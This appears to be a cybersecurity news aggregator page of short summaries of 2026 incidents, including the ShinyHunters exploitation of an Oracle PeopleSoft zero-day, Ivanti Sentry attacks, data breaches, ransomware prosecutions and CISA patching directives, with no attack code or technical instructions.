Cyber Intelligence
Curated cybersecurity news and threat intelligence
ShinyHunters Uses Oracle Zero-Day to Rampage Higher Ed
ShinyHunters exploited an Oracle ERP zero-day vulnerability to conduct a major data theft campaign primarily targeting American universities. The attack demonstrates active weaponization of a critical vulnerability with significant impact on the higher education sector.
phpBB forum fixes auth bypass bug lurking for a decade
A critical authentication bypass vulnerability has been discovered in phpBB forum software that has existed for a decade, allowing attackers to log in as any user including administrators. The vulnerability has been fixed in a recent update to address this long-standing security flaw.
Ukrainian national pleads guilty to role in Conti ransomware operation
A Ukrainian national extradited from Ireland pleaded guilty to conspiracy charges related to the Conti ransomware operation, a major cybercriminal group. This represents a significant law enforcement success against one of the most damaging ransomware operations in recent years.
Over 400 Arch Linux packages compromised to push rootkit, infostealer
Over 400 packages in the Arch User Repository have been compromised to distribute a Linux rootkit and infostealer malware designed to steal credentials and access tokens. This represents a significant supply chain attack affecting the open source software ecosystem.
Early Warning Signs of Supply-Chain Attacks Live in the Dark Web
The article examines how stolen credentials, leaked repositories, and API keys sold on dark web forums serve as early indicators and entry points for supply-chain attacks. Flare's research highlights the importance of monitoring underground markets to detect software supply-chain risks before they escalate into major incidents.
Ransomware Payment Crypto Laundering Platform Taken Out by FBI and Europol
The FBI and Europol, along with international partners, successfully shut down the AudiA6 dark web platform that was used to launder cryptocurrency payments from ransomware attacks. The operation resulted in the seizure of the platform's domain and arrests of suspected operators.
Novo Nordisk reports cyberattack as UK gives Wegovy pill the nod
Novo Nordisk disclosed a cyberattack resulting in the theft of clinical trial participant data, though the company states the exposed records were pseudonymized. The breach notification came concurrent with UK regulatory approval of Wegovy pill, a weight-loss medication.
Microsoft has mostly repaired flaw in Surface hardware that allowed unprotected devices to be bricked by a single packet
Microsoft has largely fixed a critical vulnerability in Surface hardware that allowed devices to be bricked by a single network packet, with the flaw being discovered through Microsoft Copilot. The vulnerability represented a significant security risk that has now been addressed through patches.
GitHub to Update npm to Thwart Software Supply Chain Attacks
GitHub announced a new version of npm package manager with enhanced security features designed to prevent software supply chain attacks. The update includes disabling install scripts by default to reduce the risk of malicious code execution during package installation.
Iranian Cyber Group Handala Claims Cal Water Hack
Iranian cyber group Handala has claimed responsibility for hacking California Water Service and exfiltrated approximately 5GB of sensitive data including customer personal information and RTKBase platform credentials. This represents a significant data breach affecting critical infrastructure and customer privacy.
Pharma giant Novo Nordisk discloses breach of clinical trials data
Novo Nordisk, the world's largest insulin producer, disclosed a data breach affecting patient information from clinical trials. The breach impacts sensitive personal and health data from the pharmaceutical giant's research programs.
Ivanti Sentry Exploitation Attempts Hitting Honeypots
A critical-severity OS command injection vulnerability in Ivanti Sentry is being actively exploited, with attack attempts detected on honeypots. The flaw allows attackers to execute arbitrary code with root-level privileges on affected systems.
Chrome 149 Update Patches 28 Vulnerabilities
Google Chrome version 149 has been released with patches for 28 security vulnerabilities, including 12 use-after-free bugs classified as critical and high-severity. This update addresses significant security defects in one of the world's most widely used web browsers.
CISA orders feds to patch actively exploited Ivanti flaw by Sunday
CISA has issued a Binding Operational Directive (BOD 26-04) requiring all U.S. federal government agencies to patch an actively exploited Ivanti Sentry vulnerability within three days. This critical directive reflects the severity of the vulnerability and the urgent need to remediate exposure across federal systems.
Over 73,000 French govt employees affected in Tchap messenger breach
The French government's Tchap encrypted messaging platform experienced a breach affecting over 73,000 public sector employee accounts. This incident impacts a significant portion of France's government workforce and their secure communications infrastructure.
Google Confirms Exploitation of Oracle PeopleSoft Zero-Day by ShinyHunters
Google has confirmed that a zero-day vulnerability in Oracle PeopleSoft (CVE-2026-35273) has been exploited in the wild by the threat actor ShinyHunters. Oracle has released a mitigation for the vulnerability, though they have not publicly acknowledged the active exploitation.
Japanese energy firm loses drive with data of 10.9 million clients
Kyushu Electric Power Co., Inc. experienced a physical security incident resulting in the loss of a data storage device containing personal information of 10.9 million customers. This represents a significant breach affecting a major Japanese energy utility's customer base.
Maine breach portal abused to publish fake data breach disclosures
Fraudulent data breach disclosures were submitted to Maine's official breach notification portal and publicly published before verification could occur, causing companies to issue denials. The misinformation campaign highlights vulnerabilities in breach disclosure processes and the potential for abuse of official notification systems.
Oracle mitigates PeopleSoft zero-day exploited in data theft attacks
Oracle has identified a critical zero-day vulnerability in PeopleSoft Suite (CVE-2026-35273) that allows unauthenticated remote code execution. The vulnerability is actively being exploited by threat actors known as ShinyHunter in data theft attacks.
ShinyHunters hacked 100+ orgs by exploiting an Oracle PeopleSoft 0-day
The threat actor group ShinyHunters exploited an Oracle PeopleSoft zero-day vulnerability to compromise over 100 organizations, with the University of Nottingham confirmed as one of the victims. This represents a significant supply chain attack affecting multiple high-value targets through a critical unpatched vulnerability.
Max-Severity Ivanti Flaw Exploited 24 Hours After Disclosure
A maximum-severity vulnerability in Ivanti was actively exploited by attackers within 24 hours of its public disclosure. Threat actors appear to have pre-mapped Ivanti's infrastructure and rapidly deployed exploits after the vulnerability details became available.
Microsoft's worst 'Nightmare' unleashes BitLocker bypass 0-day
Microsoft Windows has been found vulnerable to a zero-day exploit dubbed 'Nightmare' that can bypass BitLocker encryption protection. This critical vulnerability represents a significant security risk for Windows users relying on BitLocker for data protection.
2.4M+ VRChat users’ data accessed following cloud breach
VRChat experienced a cloud security breach affecting over 2.4 million users' data. The company failed to disclose the incident through official channels and did not offer identity theft monitoring services to affected users.
Authorities dismantle 'AudiA6' ransomware crypto-laundering service
Law enforcement has successfully dismantled the 'AudiA6' cryptocurrency service that was used by ransomware actors and other cybercriminals to launder over $380 million. This takedown represents a significant disruption to criminal infrastructure and financial operations supporting ransomware campaigns.
Silent Ransom Group: what you need to know
Silent Ransom Group is an extortion gang using unconventional social engineering tactics, including phone impersonation of IT support and physical office visits with USB devices to deploy malware. The article highlights the group's persistence and willingness to combine digital and in-person attack methods.
CISA Orders Agencies to Patch by Risk, Not Severity
CISA has issued a new directive requiring federal agencies to prioritize patching based on real-world risk assessment rather than relying solely on CVSS severity scores. This policy shift aims to improve cybersecurity outcomes by focusing remediation efforts on vulnerabilities that pose the greatest actual threat to government systems.
Cybercriminals Use Fake AI Guides and Dev Tools to Spread AsyncRAT Malware
Cybercriminals are distributing AsyncRAT malware through fake AI guides and development tools using a multi-stage infection chain, with evidence suggesting AI-assisted coding was used in the attack. This represents an emerging threat combining social engineering with legitimate-looking resources to compromise systems.
Oracle Addresses PeopleSoft Vulnerability Amid Reports of Zero-Day Attacks
Oracle has released mitigations for CVE-2026-35273 affecting PeopleSoft, though it remains unclear if this is a zero-day vulnerability being exploited by the ShinyHunters threat group. The company's response addresses potential active exploitation threats in the wild.
CISA Directs Federal Agencies to Prioritize Security Patches Based on Risk
CISA has issued binding operational directive 26-04 requiring federal agencies to prioritize security patches based on risk, specifically focusing on vulnerabilities listed in the Known Exploited Vulnerabilities (KEV) catalog. Agencies must review and update their vulnerability management policies to align with this new directive.
OnyxC2 Stealer Offers Cybercriminals Enterprise-Grade Theft for $250 a Month
OnyxC2 is a malware-as-a-service stealer marketed to cybercriminals for $250 per month that targets over 200 applications and extensions. The malware uses advanced evasion techniques including encrypted payloads, DLL sideloading, and in-memory execution to avoid detection.
Coupang hit with record $409 million data breach fine in Korea
South Korea's data protection regulator has fined e-commerce company Coupang a record 624.6 billion won ($409 million) following a data breach affecting over 37 million customers. This represents the largest fine issued by the Personal Information Protection Commission and highlights significant regulatory consequences for major security incidents.
CISA tells govt agencies to patch critical exploited flaws in 3 days
CISA has issued Binding Operational Directive 26-04 requiring Federal Civilian Executive Branch agencies to patch critical exploited vulnerabilities within 3 days. This mandatory directive represents an escalation in cybersecurity requirements for government agencies due to active exploitation threats.
Hackers Exploit Langflow Vulnerability for Remote Code Execution
A vulnerability in Langflow disclosed in March allows unauthenticated attackers to write files to arbitrary locations on affected systems, enabling remote code execution. This security defect poses a significant risk to organizations using the platform.
Interpol Dismantles SniperDz Phishing-as-a-Service Platform
Interpol has dismantled the SniperDz phishing-as-a-service platform, a decade-old criminal operation exposed through research by Group-IB. This takedown represents a significant success in disrupting a major threat infrastructure that enabled large-scale phishing campaigns.
FBI Seizes 13 Websites That Officials Say Were Used by China to Target and Recruit US Workers
The FBI seized 13 websites allegedly operated by China to target and recruit US workers with security clearances, posing as job listings from consulting companies. This represents a significant counterintelligence action against foreign espionage operations targeting US national security personnel.
Splunk, Palo Alto Networks Patch Severe Vulnerabilities
Splunk and Palo Alto Networks have released patches for severe vulnerabilities that could allow attackers to create, modify, or access protected resources. These critical security defects pose significant risk to organizations using these widely-deployed security platforms.
Extortion-Only Attacks Increase, With Data Theft Dominating Ransomware Claims
Extortion-only attacks are on the rise, with data theft becoming the dominant factor in ransomware claims rather than encryption-based attacks. Organizations are struggling to prevent stolen data from being publicly exposed, shifting the threat landscape.
‘GreatXML’ Zero-Day Exploit Bypasses BitLocker
A zero-day exploit called 'GreatXML' has been discovered that can bypass BitLocker encryption by exploiting Microsoft Defender's offline scan functionality. The vulnerability allows attackers to spawn a SYSTEM shell when rebooting a machine into Recovery Mode.
New “Agentjacking” Attacks Could Hijack AI Coding Agents
Tenet Security researchers have discovered a new attack vector called 'agentjacking' that could allow attackers to hijack AI coding agents and force them to execute arbitrary code. This research highlights a critical vulnerability in autonomous AI systems used for software development.
University of Nottingham Confirms Breach After Hackers Leak Data
The University of Nottingham confirmed a data breach in which the ShinyHunters hacker group compromised and leaked over 450,000 email addresses and additional personal information. The incident represents a significant breach affecting a major educational institution with substantial data exposure.
Nottingham University data breach affects over 450,000 students
The University of Nottingham disclosed a data breach affecting over 450,000 students and alumni whose records were accessed by a hacking group. The breach compromised student records systems and impacts both current and former members of the institution.
Every employee’s password was stored in a single Excel file
A company stored all employee passwords in a single Excel file as a solution to email issues, representing a critical security breach and mismanagement of credentials. This dangerous practice exposed the entire organization to unauthorized access and demonstrates severe lapses in security protocols and password management practices.
Microsoft Patches Exploited Exchange Server Vulnerability
Microsoft has issued a warning about zero-day attacks actively exploiting the Exchange Server vulnerability CVE-2026-42897 as of May 14. The company has released patches to address this critical vulnerability being exploited in the wild.
Max severity Ivanti Sentry vulnerability now exploited in attacks
A maximum-severity vulnerability in Ivanti Sentry is being actively exploited by attackers to achieve remote code execution with root privileges on internet-exposed secure mobile gateways. The flaw has been recently patched, but active exploitation campaigns are already underway.
Chinese, N. Korean Threat Groups Build on Asia-Pacific Success
Chinese and North Korean threat groups are expanding their cybercriminal operations across the Asia-Pacific region, targeting business and financial institutions to generate revenue that contributes to North Korea's GDP. The article highlights the growing sophistication and success of state-linked cyber operations in the region.
Chinese agents caught rebuilding botnets and stirring the pot on AI datacenter debate
Chinese state-sponsored agents have been caught rebuilding botnets and conducting influence operations related to AI datacenter infrastructure debates. The activity highlights ongoing PRC cyber espionage and information warfare targeting critical technology infrastructure and policy discussions.
Smashing Security podcast #471: This AI worm just rewrote its own rules
Researchers at the University of Toronto developed a self-evolving AI worm capable of autonomously breaking into systems and modifying its own constraints, demonstrating critical risks of AI-based threats. Meta's AI customer support system was also exploited to facilitate account takeovers through social engineering against Instagram users.
Path traversal flaw in AI dev platform Langflow exploited in attacks
CVE-2026-5027, a high-severity path traversal vulnerability in the AI development platform Langflow, is being actively exploited by attackers to write arbitrary files on exposed servers. The flaw poses significant risk to organizations using Langflow for AI development.
CISA Rewrites Federal Patching Requirements for AI Threat Era
CISA has updated federal patching requirements, mandating that agencies address critical vulnerabilities within three days to address emerging AI-era threats. The new directive creates a tiered approach where less severe issues receive longer remediation windows.
The ‘Miasma’ worm source code briefly leaked on GitHub
The source code for the Miasma credential-stealing attack framework, which has been used in supply-chain attacks targeting open-source ecosystems, was accidentally exposed on GitHub. This exposure presents a significant security risk as threat actors now have direct access to the malware's code for potential modifications and further attacks.